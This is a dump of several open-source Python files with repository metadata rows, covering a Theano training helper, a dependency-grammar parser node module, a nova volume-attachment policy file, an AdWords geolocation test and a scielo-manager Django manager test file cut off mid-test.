# y_batch: y_shared[index * batch_size: (index + 1) * batch_size],
# }
# else:
# givens = {
# X_batch: X_shared[index * batch_size: (index + 1) * batch_size],
# y_batch: y_shared[index * batch_size: (index + 1) * batch_size],
# }
# output_layer = model.get_output_layer()
# # Build expression to evalute network output without dropout
# #newtork_output = output_layer.get_output(X_batch, deterministic=True)
# newtork_output = layers.get_output(output_layer, X_batch, deterministic=True)
# newtork_output.name = 'network_output'
# # Build expression to evaluate loss
# objective = objectives.Objective(output_layer, loss_function=model.loss_function)
# loss_train = objective.get_loss(X_batch, target=y_batch) # + 0.0001 * lasagne.regularization.l2(output_layer)
# loss_train.name = 'loss_train'
# # Build expression to evaluate updates
# with warnings.catch_warnings():
# warnings.filterwarnings('ignore', '.*topo.*')
# all_params = lasagne.layers.get_all_params(output_layer, trainable=True)
# updates = lasagne.updates.nesterov_momentum(loss_train, all_params, model.learning_rate, model.momentum)
# # Get performance indicator outputs:
# # Build expression to convert network output into a prediction
# prediction = model.make_prediction_expr(newtork_output)
# # Build expression to compute accuracy
# accuracy = model.make_accuracy_expr(prediction, y_batch)
# theano_backprop = theano.function(
# inputs=[index],
# outputs=[loss_train, newtork_output, prediction, accuracy],
# updates=updates,
# givens=givens
# )
# theano_backprop.name += ':theano_backprob:indexed'
# #other_outputs = [probabilities, predictions, confidences]
# #theano_backprop = theano.function(
# # inputs=[theano.Param(X_batch), theano.Param(y_batch)],
# # outputs=[loss] + other_outputs,
# # updates=updates,
# # givens={
# # X: X_batch,
# # y: y_batch,
# # },
# #)
# #theano_forward = theano.function(
# # inputs=[theano.Param(X_batch), theano.Param(y_batch)],
# # outputs=[loss_determ] + other_outputs,
# # updates=None,
# # givens={
# # X: X_batch,
# # y: y_batch,
# # },
# #)
# #theano_predict = theano.function(
# # inputs=[theano.Param(X_batch)],
# # outputs=other_outputs,
# # updates=None,
# # givens={
# # X: X_batch,
# # },
# #)
# return theano_backprop
#def create_sliced_network_output_func(model):
# # Initialize symbolic input variables
# X_batch = T.tensor4(name='X_batch')
# # weird, idk why X and y exist
# X = T.tensor4(name='X_batch')
# output_layer = model.get_output_layer()
# # Build expression to evalute network output without dropout
# #newtork_output = output_layer.get_output(X_batch, deterministic=True)
# newtork_output = layers.get_output(output_layer, X_batch, deterministic=True)
# newtork_output.name = 'network_output'
# theano_forward = theano.function(
# inputs=[theano.Param(X_batch)],
# outputs=[newtork_output],
# givens={
# X: X_batch,
# }
# )
# theano_forward.name += ':theano_forward:sliced'
# return theano_forward
| apache-2.0 | 2,204,840,963,682,259,000 | 37.097403 | 115 | 0.623317 | false |
LowResourceLanguages/hltdi-l3 | l3xdg/node.py | 1 | 24288 | # Implementation of Extensible Dependency Grammar, as described in
# Debusmann, R. (2007). Extensible Dependency Grammar: A modular
# grammar formalism based on multigraph description. PhD Dissertation:
# Universität des Saarlandes.
#
########################################################################
#
# This file is part of the HLTDI L^3 project
# for parsing, generation, and translation within the
# framework of Extensible Dependency Grammar.
#
# Copyright (C) 2010, 2011, 2012, 2013, 2014
# by the HLTDI L^3 Team <gasser@cs.indiana.edu>
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# 2010.08.21 (MG)
# -- Node in a separate module.
# -- Node has a dict of dimensions with dimension-specific variables.
# -- Almost all variable creation now handled by principles.
# 2010.09.13 (MG)
# -- initialize now includes inheritance.
# 2010.10.17 (MG)
# -- initialize now adds entries resulting from morphological analysis.
# 2010.10.18 (MG)
# -- Node constructor takes both the original word and possibly preprocessed
# word (form). form is used for lexicalization.
# 2011.02.10
# -- EmptyNode, subclass of Node, created.
# 2011.04.10
# -- Empty nodes keep track of the index of their "source" (mother) node. Needed
# for EmptyNode Principle.
# 2011.05.13
# -- New subclass of EmptyNode for the more complicated general language node mismatch
# case, for examples, prepositions in Qu->Es.
# 2011.12.04
# -- Reverse ComplexEmptyNodes
# 2012.09.11
# -- Lexical entry indices may be constrained during initialization, using problem's (xdg)
# lex_indices.
# 2013.10.29
# -- "Unknown" node; its 'name' is '*', that is, no lexical entry was found.
# 2014.02.04
# -- Nodes know how to use entries that are already morphologically analyzed and/or
# have their crosslingual features already spelled out.
from .variable import *
from .utils import PARSE, GENERATE, TRANSLATE
class Node:
def __init__(self, word, form, lexicon, problem, dstore, dims=None, agree=None,
index=0, process=0, analyses=None, lex=None, arcs=None, eos=False,
empty=False, verbosity=0):
"""
form is the possibly preprocessed form of word. This is used for lexicalization
during parsing.
lex and arcs are non-None for generation.
"""
self.word = word
self.form = form
self.lexicon = lexicon
self.language = lexicon.language
self.problem = problem
# Whether this is an end-of-sentence node
self.eos = eos
## parse, generate, or translate
self.process = process or problem.process
# target language abbreviations
# self.languages = [language.abbrev for language in problem.languages]
self.languages = problem.languages
self.target_languages = self.languages
# add semantics
if problem.semantics:
self.languages = [problem.semantics] + self.languages
# Lexicons to use in inheritance
# Whether to use transfer xlexes in inheritance
self.transfer_xlex = problem.transfer_xlex
# Possibly one or more wordforms for each language
self.forms = {}
# If translation languages have morphological analysis
self.roots = {}
self.dstore = dstore
# Position
self.index = index
# For translation, nodes have different positions in different languages,
# represented by variables that are created by OrderPrinciple
self.positions = {}
## Generation
# A tuple of lexicon key (word, lexeme, gram) and entry index
self.lex = lex
# dict of {dim: {'out': [(label, dest)], 'in': [(label, source)]}}
self.arcs = arcs
# Actual positions in multiple languages
self.positions = {}
self.analyses = analyses
self.entries = []
self.dims = dict((d, {}) for d in dims) if dims else {}
# Agreement dimensions
self.agree = agree
## Lexical entry
# Create a variable for this
self.lexvar = None
# Variables for group IDs (set in GroupP)
self.groupvars = {}
# Empty nodes that are possible daughters of this node.
# dict keeps track of the node and entry indices for each empty node entry:
# {empty_entry: [empty_node, mother_entry_index1, ...]}
if not empty:
self.empty_nodes = {}
self.empty = False
else:
self.empty = True
# Determined SVar with this node's index as its value; called 'eq' by Debusmann
self.dsvar = DetSVar('{}='.format(self.index), {self.index})
self.initialize(dims, verbosity=verbosity)
def __repr__(self):
return '&{}{}'.format(self.index, self.word)
def initialize(self, dimensions, verbosity=1):
"""Find lexical entries and create all variables."""
lex_indices = self.problem.lex_indices[self.index]
if lex_indices is None:
lex_indices = set()
elif not isinstance(lex_indices, set):
lex_indices = {lex_indices}
entries = self.lexicon.lexicalize(self.form, clone=True, indices=lex_indices, any_other=self.analyses,
verbosity=verbosity)
# print('{}/{} entries following lexicalization: {}'.format(self, self.form, entries))
if self.analyses:
# print('Morphological analyses for {}: {}'.format(self, self.analyses))
if verbosity:
print("Incorporating morphological analysis for", self)
entries.extend(self.lexicon.incorp_analyses(self.analyses, self.agree,
word=self.form, problem=self.problem))
# entries.extend(self.lexicon.lexicalize(self.form, clone=True, indices=lex_indices))
print('Entries before crossling inh: {}'.format(entries))
# For each entry, inherit properties from lexical classes.
# For flattened lexicons, the only inheritance that happens is across languages.
if self.languages or self.lexicon.hierarchical:
unknown = None
lang_abbrevs = [l.abbrev for l in self.target_languages]
to_incorp = []
for entry in entries:
if entry.is_inherited(lang_abbrevs):
print('Entry {} is cross-inherited for {}'.format(entry, lang_abbrevs))
self.entries.append(entry)
continue
# Any additional entries found from classes during inheritance
add_entries = []
# Accumulate entries to add
self.lexicon.inherit(entry, [d.abbrev for d in dimensions],
add_entries=add_entries, node=self,
languages=self.languages,
target_languages=self.target_languages,
process=self.process,
transfer_xlex=self.transfer_xlex,
verbosity=verbosity)
if add_entries:
# print('{} add entries {}, languages {}'.format(self, add_entries, lang_abbrevs))
for e in add_entries:
if any([e.is_unknown(l) for l in lang_abbrevs]):
# print('{} is unknown'.format(e))
unknown = e
else:
to_incorp.append(e)
# print('Add {} to entries'.format(e))
self.entries.append(e)
# If there are no other entries, use the (last) unknown one
if not self.entries and unknown:
# print('No entries for {}, adding unknown'.format(self))
self.entries = [unknown]
# # Add any new entries found to the node
# self.entries.extend(add_entries)
# This is where new cross-lingual entries get created and stored.
if self.languages and to_incorp:
self.lexicon.incorp_cross_inh(self.word, to_incorp)
# Set probabilities on the basis of lex xcounts
if len(self.entries) > 1:
if verbosity:
print("Setting probabilities for {} entries".format(len(self.entries)))
total = sum([e.xcount for e in self.entries])
for e in self.entries:
e.prob = e.xcount / total
else:
self.entries = entries
# Set entry probabilities on the basis of lex counts
if len(entries) > 1:
if verbosity:
print("Setting probabilities for {} entries".format(len(entries)))
# Set probabilities for different analyses
total = sum([e.count for e in entries])
for e in entries:
e.prob = e.count / total
# for e in self.entries:
# if e.crosslexes:
# print('Removing crosslexes from {}'.format(e))
# e.crosslexes = {}
# Assign entry scores
self.scores = [0 for e in self.entries]
if not self.entries:
print('NO ENTRIES FOR {}!'.format(self))
def finalize(self, verbosity=1):
"""Set lexical variable and normalize probabilities."""
## Variable for node's entries
lexvar_name = '{}{}'.format(self.index, self.word)
if len(self.entries) == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
# Normalize the probabilities
prob_total = sum([e.prob for e in self.entries])
for e in self.entries:
e.prob /= prob_total
for e in self.entries:
if verbosity:
print(' {} prob: {}'.format(e, e.prob))
# total = sum([e.count for e in self.entries])
# for e in self.entries:
# e.prob *= e.count / total
# print(' {}: count {}, prob {}'.format(e, e.count, e.prob))
self.lexvar = IVar(lexvar_name,
range(len(self.entries)),
problem=self.problem, rootDS=self.dstore)
def rank(self, verbosity=0):
"""Rank and sort entries by score, eliminating those with negative scores."""
entries_scores = list(zip(self.entries, self.scores))
entries_scores.sort(key=lambda e_s: e_s[1], reverse=True)
# for e, s in entries_scores:
# if s < 0:
# print('Entry {} eliminated'.format(e))
self.entries = [e for e, s in entries_scores if s >= 0]
def is_novel(self):
"""Is this a node for an unknown word?"""
if len(self.entries) == 1 and self.entries[0].name == '*':
return True
return False
## Debugging methods for examining various node variables
def exam_vars(self, dim_abbrev='', vartype='', var=''):
dimD = self.dims
varD = None
for dim, vars in dimD.items():
if dim.abbrev == dim_abbrev:
varD = vars
if varD:
if vartype:
vars = varD.get(vartype)
if var and vars:
return vars.get(var)
elif vars:
return vars
# v = vars.get(var)
# if v: v.pprint()
# return v
else:
# for v in vars: v.pprint()
return varD
def exam_valency(self, dim_abbrev='', outs=True, var=''):
return self.exam_vars(dim_abbrev=dim_abbrev,
vartype = 'outvars' if outs else 'invars',
var=var)
def exam_agr(self, dim_abbrev='', var=''):
return self.exam_vars(dim_abbrev=dim_abbrev,
vartype = 'agrvars',
var=var)
def exam_lex(self, dstore=None):
self.lexvar.pprint(dstore=dstore)
return self.lexvar
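    # Illustrative usage of the exam_* debugging helpers above (a minimal sketch;
    # the dimension abbreviation 'syn' and the variable name 'num' are hypothetical
    # and depend on the grammar that was loaded):
    #   node.exam_lex()                      # print and return the node's lexical variable
    #   node.exam_valency('syn', outs=True)  # out-valency variables on dimension 'syn'
    #   node.exam_agr('syn', var='num')      # a single agreement variable on 'syn'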
def get_possible_labels(self, dim, out=True):
"""Assign list of labels for possible in and out arcs for each dimension.
Used in arc disambiguation."""
labels = set()
for entry, score in zip(self.entries, self.scores):
if score >= 0:
# Only record labels for entries that have not been excluded
entry_dim = entry.dims.get(dim.abbrev)
if entry_dim:
arcs = entry_dim.attribs.get('outs' if out else 'ins', {})
for label, attrib in arcs.items():
                    if attrib != 0:
labels.add(label)
return labels
def get_required_labels(self, entry, dim, out=True):
"""Assign list of required out or in labels for a given entry on a dimension.
Used in arc disambiguation.
"""
d = entry.dims.get(dim.abbrev)
if d:
arcs = d.attribs.get('outs' if out else 'ins')
if arcs:
return [label for label, attrib in arcs.items() if attrib in ('!', '+')]
return []
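    # Worked example (label names here are hypothetical): if an entry's 'outs' dict
    # on this dimension were {'sbj': '!', 'obj': 0}, get_required_labels(entry, dim)
    # would return ['sbj'], since only the '!' and '+' attributes mark a label as required.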
def get_dim_dict(self, abbrev):
"""Get the dimension dict associated with the dimension with abbreviation abbrev."""
for dim, dct in self.dims.items():
if dim.abbrev == abbrev:
return dct
return {}
class EmptyNode(Node):
'''Empty nodes: no form, at least in some language. They may end up "used" (with non-del in arcs
on the dimension where they are created), or "unused" (with del in arcs on the dimension where they
are created).'''
def __init__(self, lexicon, problem, dstore, entry_key, src_entry, src_node_index,
dims=None, verbosity=0, index=-1):
# An empty node starts with an entry already created ...
# self.entry = entry.clone()
# ... and source (mother) entry that it came from
self.src_entry = src_entry
# ... and a source (mother) node.
self.src_node_index = src_node_index
self.complex = False
Node.__init__(self, entry_key + str(src_node_index), entry_key, lexicon, problem, dstore,
dims=dims, index=index, empty=True, eos=False)
print('Created empty node {}, source: {}'.format(self, src_entry))
# Node.__init__(self, entry.name + str(src_node_index), '', lexicon, problem, dstore,
# dims=dims, index=index, empty=True, eos=False)
# def __repr__(self):
# return '&{}{}'.format(self.index, self.entry.name)
def initialize(self, dimensions, verbosity=0):
"""Find lexical entries and create all variables."""
self.entries = []
entries = self.lexicon.lexicalize(self.form, word=False, clone=True)
# print('Empty node entries found for {}: {}'.format(self.form, entries))
# self.entries = []
# entries = [self.entry]
# For each entry, inherit properties from lexical classes
if self.languages or self.lexicon.hierarchical:
for entry in entries:
# Any additional entries found from classes during inheritance
# print('Adding entries for empty node {} starting with {}'.format(self, entry))
add_entries = []
# Accumulate entries to add
self.lexicon.inherit(entry, [d.abbrev for d in dimensions],
add_entries=add_entries, node=self,
languages=self.languages,
target_languages=self.target_languages,
process=self.process,
transfer_xlex=self.transfer_xlex,
verbosity=verbosity)
if add_entries:
# Add any new entries found to the node
self.entries.extend(add_entries)
else:
self.entries = entries
# if not self.entries:
# print('NO ENTRIES FOR {}!'.format(self))
# Assign entry scores
self.scores = [0 for e in self.entries]
def finalize(self, verbosity=1):
n_entries = len(self.entries)
if n_entries == 0:
print("WARNING: NO ENTRIES FOUND FOR {}".format(self))
lexvar_name = '{}{}'.format(self.index, self.word)
if n_entries == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
## Variable for node's entries.
self.lexvar = IVar(lexvar_name,
set(range(n_entries)),
problem=self.problem, rootDS=self.dstore)
class ComplexEmptyNode(EmptyNode):
    '''Empty node with entries in two different languages (one of them "zero") and a
    relationship ("mother" or "daughter") with another node.'''
def __init__(self, lexicon, problem, dstore, entry,
src_entry, src_entry_index, src_node_index,
targ_entries=None,
targ_lexicon=None, rel=None,
dims=None, rev=False, if_dim='',
verbosity=0, index=-1):
# print('Making complex empty node; empty entry {}, src entry {}, if dim {}'.format(entry, src_entry, if_dim))
self.entry = entry
self.target_entries = [e.clone() for e in targ_entries]
# for e in self.target_entries:
        #  print('  {} names {}'.format(e, e.names))
self.target_lexicon = targ_lexicon
self.target_language = targ_lexicon.language.abbrev
self.rel = rel or ['mother']
self.rev = rev
self.if_dim = if_dim
# A hack to make sure the node's entry has the right 'name', etc.
for e in self.target_entries:
current_names = e.names.get(self.target_language, {})
if self.target_language not in e.names:
e.names[self.target_language] = current_names
if e.word:
current_names['word'] = e.word
elif e.lexeme:
current_names['lexeme'] = e.lexeme
elif e.gram:
current_names['gram'] = e.gram
if e.pos:
current_names['pos'] = e.pos
if e.root:
current_names['root'] = e.root
EmptyNode.__init__(self, lexicon, problem, dstore, entry.name, src_entry, src_node_index,
dims=dims, verbosity=verbosity, index=index)
self.complex = True
# self.trigger_entry_index = src_entry_index
# def __repr__(self):
# return '&{}@{}'.format(self.index, self.target_entries[0].get_name())
def initialize(self, dimensions, verbosity=0):
"""Find lexical entries and create all variables."""
entries = self.lexicon.lexicalize(self.form, word=False, clone=True)
# print('Empty node entries found for {}: {}'.format(self.form, entries))
self.entries = []
# add_entries = self.target_entries[:]
dims = [d.abbrev for d in dimensions]
src_language = self.problem.language
add_entries = []
# print('<<<<<Inheriting for', self, 'and',
# self.target_entries, 'lexicon', self.target_lexicon)
if self.languages or self.lexicon.hierarchical:
for targ in self.target_entries:
# print('{} inheriting from {}, dims {}'.format(self, targ, dims))
# print('Names {}'.format(targ.names))
add_entries = []
self.target_lexicon.inherit(targ, dims, node=self,
add_entries=add_entries,
languages=self.languages,
target_languages=self.target_languages,
transfer_xlex=self.transfer_xlex,
# If reverse is True, we'll inherit back from the target lexical
# node to its translation in the source language instead of maintaining.
# But will this work for non-chunk translation??
reverse=False,
process=self.process,
src_language=src_language,
verbosity=verbosity)
self.entries.extend(add_entries)
for e in self.entries:
# print(' Inheriting from lex {}'.format(self.entry))
# for d in dims:
# if 'synsyn' not in d:
# if d in e.dims:
# ins = e.dims[d].__dict__.get('attribs', {}).get('ins')
# if ins:
# print(' Ins for {}/{}: {}'.format(e, d, ins))
self.lexicon.inherit(e, dims, node=self,
classes=[[self.entry]],
add_entries=add_entries,
languages=self.languages,
target_languages=self.target_languages,
transfer_xlex=self.transfer_xlex,
# reverse used to be True here too, but this doesn't work with
# chunking
reverse=False,
process=self.process,
src_language=src_language,
verbosity=verbosity)
else:
self.entries = entries
# self.entries = add_entries
# if not self.rev:
# add_entries = []
# for targ in self.target_entries:
# self.target_lexicon.inherit(self.entry, dims, node=self,
# classes=[[self.entry]],
# add_entries=add_entries,
# languages=self.languages,
# target_languages=self.target_languages,
# transfer_xlex=self.transfer_xlex,
# reverse=True, process=self.process,
# src_language=src_language,
# verbosity=verbosity)
#
# if add_entries:
# self.entries.extend(add_entries)
# Assign entry scores
self.scores = [0 for e in self.entries]
def finalize(self, verbosity=1):
lexvar_name = '{}{}'.format(self.index, self.word)
if len(self.entries) == 1:
# Determine the variable now if there's no ambiguity
self.lexvar = DetIVar(lexvar_name, 0)
else:
## Variable for node's entries.
self.lexvar = IVar('{}{}'.format(self.index, self.word),
set(range(len(self.entries))),
problem=self.problem, rootDS=self.dstore)
# print('{} has entries: {}'.format(self, self.entries))
| gpl-3.0 | 3,774,457,073,550,813,000 | 44.059369 | 117 | 0.537077 | false |
vmturbo/nova | nova/policies/volumes_attachments.py | 1 | 2496 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
POLICY_ROOT = 'os_compute_api:os-volumes-attachments:%s'
volumes_attachments_policies = [
base.create_rule_default(
POLICY_ROOT % 'index',
base.RULE_ADMIN_OR_OWNER,
"List volume attachments for an instance",
[
{'method': 'GET',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'create',
base.RULE_ADMIN_OR_OWNER,
"Attach a volume to an instance",
[
{
'method': 'POST',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'show',
base.RULE_ADMIN_OR_OWNER,
"Show details of a volume attachment",
[
{
'method': 'GET',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
policy.RuleDefault(
name=POLICY_ROOT % 'discoverable',
check_str=base.RULE_ANY),
base.create_rule_default(
POLICY_ROOT % 'update',
base.RULE_ADMIN_API,
"Update a volume attachment",
[
{
'method': 'PUT',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
base.create_rule_default(
POLICY_ROOT % 'delete',
base.RULE_ADMIN_OR_OWNER,
"Detach a volume from an instance",
[
{
'method': 'DELETE',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
]
def list_rules():
return volumes_attachments_policies
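# For reference, POLICY_ROOT expands the rule names registered above to strings
# such as:
#   os_compute_api:os-volumes-attachments:index
#   os_compute_api:os-volumes-attachments:create
# (one per entry in volumes_attachments_policies).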
| apache-2.0 | 6,217,302,918,994,485,000 | 28.714286 | 78 | 0.555288 | false |
nearlyfreeapps/python-googleadwords | tests/adspygoogle/adwords/geo_location_service_unittest.py | 1 | 2974 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests to cover GeoLocationService."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..'))
import unittest
from tests.adspygoogle.adwords import HTTP_PROXY
from tests.adspygoogle.adwords import SERVER_V201109
from tests.adspygoogle.adwords import TEST_VERSION_V201109
from tests.adspygoogle.adwords import VERSION_V201109
from tests.adspygoogle.adwords import client
class GeoLocationServiceTestV201109(unittest.TestCase):
"""Unittest suite for GeoLocationService using v201109."""
SERVER = SERVER_V201109
VERSION = VERSION_V201109
client.debug = False
service = None
def setUp(self):
"""Prepare unittest."""
print self.id()
if not self.__class__.service:
self.__class__.service = client.GetGeoLocationService(
self.__class__.SERVER, self.__class__.VERSION, HTTP_PROXY)
def testGetGeoLocationInfo(self):
"""Test whether we can fetch geo location information for the address."""
selector = {
'addresses': [
{
'streetAddress': '1600 Amphitheatre Parkway',
'cityName': 'Mountain View',
'provinceCode': 'US-CA',
'provinceName': 'California',
'postalCode': '94043',
'countryCode': 'US'
},
{
'streetAddress': '76 Ninth Avenue',
'cityName': 'New York',
'provinceCode': 'US-NY',
'provinceName': 'New York',
'postalCode': '10011',
'countryCode': 'US'
},
{
'streetAddress': '\u4e94\u56db\u5927\u88571\u53f7, Beijing\u4e1c\u57ce\u533a',
'countryCode': 'CN'
}
]
}
self.assert_(isinstance(self.__class__.service.Get(selector), tuple))
def makeTestSuiteV201109():
"""Set up test suite using v201109.
Returns:
TestSuite test suite using v201109.
"""
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(GeoLocationServiceTestV201109))
return suite
if __name__ == '__main__':
suites = []
if TEST_VERSION_V201109:
suites.append(makeTestSuiteV201109())
if suites:
alltests = unittest.TestSuite(suites)
unittest.main(defaultTest='alltests')
| apache-2.0 | 4,193,252,725,452,182,000 | 29.979167 | 94 | 0.640215 | false |
jfunez/scielo-manager | scielomanager/journalmanager/tests/tests_modelmanagers.py | 1 | 36083 | # coding: utf-8
from django.test import TestCase
from django_factory_boy import auth
from journalmanager import (
models,
modelmanagers,
)
from journalmanager.tests import modelfactories
class JournalManagerTests(TestCase):
def _make_user(self, *collection):
user = auth.UserF(is_active=True)
for coll in collection:
coll.add_user(user, is_manager=True)
return user
def test_manager_base_interface(self):
mandatory_attrs = ['all', 'active']
for attr in mandatory_attrs:
self.assertTrue(hasattr(models.Journal.userobjects, attr))
def test_queryset_base_interface(self):
mandatory_attrs = ['all', 'active', 'available', 'unavailable']
mm = modelmanagers.JournalQuerySet()
for attr in mandatory_attrs:
self.assertTrue(hasattr(mm, attr))
def test_all_returns_user_objects_no_matter_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
journal1 = modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
modelfactories.JournalFactory.create()
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections)
self.assertEqual(user_journals.count(), 2)
self.assertIn(journal1, user_journals)
self.assertIn(journal2, user_journals)
def test_active_returns_user_objects_bound_to_the_active_context(self):
collection1 = modelfactories.CollectionFactory.create()
collection2 = modelfactories.CollectionFactory.create()
user = self._make_user(collection1, collection2)
collection2.make_default_to_user(user)
modelfactories.JournalFactory.create(collection=collection1)
journal2 = modelfactories.JournalFactory.create(collection=collection2)
modelfactories.JournalFactory.create()
def get_active_collection():
return user.user_collection.get(usercollections__is_default=True)
user_journals = models.Journal.userobjects.active(
get_active_collection=get_active_collection)
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal2, user_journals)
def test_startswith_is_based_on_title_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('ABC')
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal1, user_journals)
def test_startswith_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('ABC')
lower_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('abc')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_startswith_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith('XYZ')
self.assertEqual(user_journals.count(), 0)
def test_startswith_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'7ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).startswith(7)
self.assertEqual(user_journals.count(), 1)
def test_simple_search_is_based_on_title_attr(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC 123', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('123')
self.assertEqual(user_journals.count(), 1)
self.assertIn(journal1, user_journals)
def test_simple_search_is_case_insensitive(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
journal1 = modelfactories.JournalFactory.create(
title=u'ABC BAZ', collection=collection)
journal2 = modelfactories.JournalFactory.create(
title=u'XYZ', collection=collection)
def get_user_collections():
return user.user_collection.all()
upper_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('BAZ')
lower_cased = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('baz')
self.assertEqual(
[j.pk for j in upper_cased],
[j.pk for j in lower_cased]
)
def test_simple_search_returns_empty_if_there_are_not_matches(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search('XYZ')
self.assertEqual(user_journals.count(), 0)
def test_simple_search_coerces_term_to_unicode(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
title=u'7 ABC', collection=collection)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).simple_search(7)
self.assertEqual(user_journals.count(), 1)
def test_available_returns_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_journals.count(), 1)
def test_available_ignores_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).available()
self.assertEqual(user_journals.count(), 0)
def test_unavailable_returns_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=True)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_journals.count(), 1)
def test_unavailable_ignores_non_trashed_items(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, is_trashed=False)
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).unavailable()
self.assertEqual(user_journals.count(), 0)
def test_current(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='current')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
get_all_collections=get_user_collections).current()
self.assertEqual(user_journals.count(), 1)
for j in user_journals:
self.assertEqual(j.pub_status, 'current')
def test_suspended(self):
collection = modelfactories.CollectionFactory.create()
user = self._make_user(collection)
modelfactories.JournalFactory.create(
collection=collection, pub_status='suspended')
def get_user_collections():
return user.user_collection.all()
user_journals = models.Journal.userobjects.all(
